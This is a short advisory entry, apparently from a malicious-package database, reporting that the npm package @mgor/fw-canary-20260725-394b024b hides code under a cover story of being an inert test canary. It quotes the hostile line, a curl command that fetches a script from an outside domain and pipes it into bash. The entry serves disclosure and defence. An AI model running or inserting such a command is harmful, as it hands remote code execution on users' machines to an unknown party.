MAL-2026-12321
Dashboard / Malicious Package / MAL-2026-12321
MAL-2026-12321
Summary: Malicious code in @mgor/fw-canary-20260725-394b024b (npm)
Details: Source: amazon-inspector (80e828a7ffd0138db85154b49b584df253be1e6509a0a4aa6475bfe317510f37) index.js, the package's declared main entry point, unconditionally executes `curl fewafw.hydege.me | /bin/bash` at top level. Any consumer that requires or imports this package fetches an unpinned, unverified shell script from a non-first-party domain and pipes it into bash, yielding arbitrary code execution on the installer's host. The package.json description and README self-label the package as an inert security-test canary with no install scripts and no functionality, directly contradicting the actual code behavior — a deceptive cover story.
Affected packages
Package
Name: @mgor/fw-canary-20260725-394b024b
Purl: pkg:npm/%40mgor/fw-canary-20260725-394b024b
Affected ranges
Type: N/A
Events:
